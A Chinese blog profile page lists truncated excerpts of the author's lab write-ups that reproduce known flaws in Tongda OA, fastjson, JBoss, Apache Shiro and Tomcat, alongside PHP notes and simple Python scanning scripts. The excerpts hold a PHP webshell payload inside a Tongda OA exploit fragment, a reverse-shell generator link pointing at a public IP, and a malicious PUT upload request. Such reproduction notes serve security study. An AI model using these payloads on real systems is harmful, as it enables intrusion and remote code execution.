自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

梦之旅行地

IT工程师一枚

  • 博客(11)
  • 收藏
  • 关注

原创 靶场复现系列--vulnstack 4

一、前言也不知道是我运气差还是怎么回事,用vmw搭靶场就是搭不起来,遇到各种问题,后来换成virtual box后解决几个问题就可以了。第一个问题,虚拟机导入后网卡最好重新配下,不然容易报网卡的错误第二个问题,启动docker报错,web服务器(ubuntu)用户未加入docker组,将ubuntu用户加入docker组后,重启就可以通过docker构建容器了,下面是加入docker组的命令 sudo gpasswd -a ${USER} docker二、实践1.拓扑备注:这图片直接在靶场

2020-12-17 15:30:49 1751

原创 漏洞复现系列--通达OA v11.6版本RCE漏洞(2020hw期间0day)

一、影响版本 11.6二、复现过程1.下载11.6版本oa,下载地址:http://www.kxdw.com/soft/23114.html2.安装3.exp脚本import requeststarget="http://ip:port/" //此处填写上面安装oa的ip及端口payload="<?php eval($_POST['hahaha']);?>"print("[*]Warning,This exploit code will DELETE auth.i

2020-08-20 11:48:19 2416 5

原创 漏洞复现系列--fastjson<=1.2.47反序列化漏洞

1.利用条件fastjson <= 1.2.472.复现环境靶机:vulhub靶场攻击环境:一台公网vps,本地burp发送攻击数据包3.具体步骤1)docker起靶场进入到vulhub靶场1.2.47-rce目录环境下cd 1.2.47-rcedocker-compose up -d浏览器访问靶场环境如下2)反弹shell命令制作https://krober.biz/misc/reverse_shell.php?ip=122.51.255.154&port=94

2020-07-27 18:02:13 2121

原创 php学习记录

一 PHP语法1.php标记脚本标记<script language="php">php代码</script>标准标记(常用)<?php php代码 ?>2.注释php注释分为两种,行注释和块注释行注释://块注释:/*被注释的内容1被注释的内容2*/3.php语句分隔符php中,代码是以行为单位,系统需要判断行的结束,通过’;'来判断是否结束...

2020-05-25 22:25:11 146

原创 漏洞复现系列--JBOSS反序列化命令执行CVE-2017-12149

一、漏洞影响范围漏洞影响5.x和6.x版本的JBOSSAS二、复现过程1.1.1.1 公网vps,用来接收反弹的shell2.2.2.2 被攻击的jboss服务器1、复现环境用的vulhub,直接docker构建下就可以cd CVE-2017-12149docker compose up -d2、docker构建好以后,启动dockerdocker start 44a...

2020-05-08 15:40:18 331

原创 漏洞复现系列--通达OA未授权上传+文件包含RCE

一、漏洞情况此漏洞是由未授权上传和本地文件包含两个漏洞组合而形成的rce漏洞文件上传地址:http://localhost:8083/ispirit/im/upload.php本地文件包含地址:http://localhost:8083/ispirit/interface/gateway.php这个地址我看有的复现地址不一样,是/mac/gateway.php,可能和操作系统有关,需要...

2020-03-21 16:37:05 2781 2

原创 漏洞复现系列--Shiro RememberMe 1.2.4 反序列化漏洞

1、漏洞利用前提:Apache Shiro <= 1.2.42、靶场:利用vulhub的靶场在服务器上搭建注:docker相关配置就没有写了,靶场能运行就行靶场搭建git clone https://github.com/vulhub/vulhub.gitcd /vulhub/shiro/CVE-2016-4437docker-compose up -d #启动靶场启...

2020-02-05 20:25:16 2568

原创 漏洞复现系列--Tomcat-PUT方法任意文件写入(CVE-2017-12615)

1、漏洞利用前提:Tomcat版本: 7.0.0 - 7.0.81配置文件conf/web.xml中的readonly设置为false开启了PUT方法2、复现过程:用burp随意抓一个GET请求包,将GET改为PUT,并上传一个jsp文件PUT /1.jsp/ HTTP/1.1Host: 对应的网站hostAccept: */*Accept-Language: enUser-A...

2020-01-14 11:23:03 495

原创 python 端口扫描脚本单线程版

记录下,端口扫描脚本单线程版,刚学python,慢慢来#!/usr/bin/python3# coding=utf-8import socketip_list = []rs_list = []f = open('ip.txt')for each in f.readlines(): tmp_ip = each.replace('\n','') ip_list.app...

2019-12-30 21:41:22 92

原创 python批量验证url能否正常访问

建立一个名为url.txt的文件,将需要批量测试的url放此文件中,执行脚本就看可以了#!/usr/bin/python3# coding=utf-8import urllib.requestimport urllib.errorf = open("url.txt")url = []for line in f.readlines(): tmp = line.replac...

2019-12-25 22:27:04 1420

原创 病毒库

https://www.virustotal.com/#/home/uploadhttp://www.virscan.org/language/zh-cn/

2019-04-03 09:26:57 419

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除